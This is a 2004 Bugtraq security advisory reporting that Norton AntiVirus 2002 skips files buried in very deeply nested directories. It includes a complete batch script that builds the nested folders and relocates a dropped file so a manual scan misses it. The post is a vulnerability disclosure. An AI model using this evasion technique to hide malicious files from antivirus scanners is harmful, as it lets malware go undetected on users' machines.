Norton AntiVirus nested file manual scan bypass.....

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Norton AntiVirus nested file manual scan bypass.....
From: Bipin Gautam <visitbipin@xxxxxxxxxxx>
Date: 17 Apr 2004 14:50:02 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Norton AntiVirus nested file manual scan bypass.....

Product Version: Norton Antivirus 2002 (~Only tested On...~)
Risk Impact: Medium
Vendor Status: No responce!

Summary:

If you manage to inject a file in the sub-directory(s); beyond windows OS can 
create normally, [ say in 130 'th + sub-directory at c:\..\..\..\....upto 
130'th ... ] NAV fails to scan the NESTED FILE. Indeed, it's more a windows 
restriction in accesing the nested file than a ANTIVIRUS flaw. Other antivirus 
product should also suffer the same. *.PLEASE VERIFY.* NAV

=-------CUT----------=
@echo off
rem Bipin Gautam [hUNT3R]
rem [http://www.geocities.com/visitbipin] * [http://www.01security.com]
echo »
echo ************************************************
echo -( For  a  harmless   test...  you   can    use,
echo http://www.eicar.org/anti_virus_test_file.htm )-
echo ************************************************
pause
cd\
c:
cd\
:hUNT3r 
md 1 
cd 1 
if not errorlevel  1 goto :hUNT3r
cd..
rmdir 1
md X
cls
echo ***************************************************************
echo  Now you can inject any file inside the folder 'X' which is inside 
echo 120'th sub-directory of 'c:\1' [ i.e c:\1\..\...\.....[120'th dir].....\X\ 
] 
echo Note: The file you are moving to'c:\1\...\X\' should only contain 
echo '1' char. file name, say: '1.exe' or '2.exe' or 'a.exe' etc... 
echo not as '123.not' 'qwert.hak'
echo .........
echo               So, ARE YOU DONE!?
echo ......... 
echo   After  this  batch   script  is  terminated,  you'll
echo   find the file you ^just copied^ inside c:\1\........\X\ 
echo   now in c:\3\3\3\3\3\1\1\1\......[130' th dir].....\X\
echo   mmm... Then have a  manual scan of c:\3\ Any file you
echo   have put inside the dir. 'X' can't be detected by NORTON Antivirus 
anymore!!!
echo ***************************************************

pause
cd\
md 3\3\3\3\3\3\3\3\3\3\
cd\
xcopy /E /I c:\1\*.* c:3\3\3\3\3\3\3\3\3\3\
exit

=-------CUT----------=

Disclaimer: The information in the advisory is believed to be accurate at the 
time of printing based on currently available information. Use of the 
information constitutes acceptance for use in an AS IS condition. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect or consequential loss 
or damage arising from use of, or reliance on this information.

Prev by Date: Re: After Ms patches last Wed ...
Next by Date: Re: After Ms patches last Wed ...
Previous by thread: RE: "Delete anti-virus and firewall software" --Microsoft
Next by thread: Re: Norton AntiVirus nested file manual scan bypass.....
Index(es):
- Date
- Thread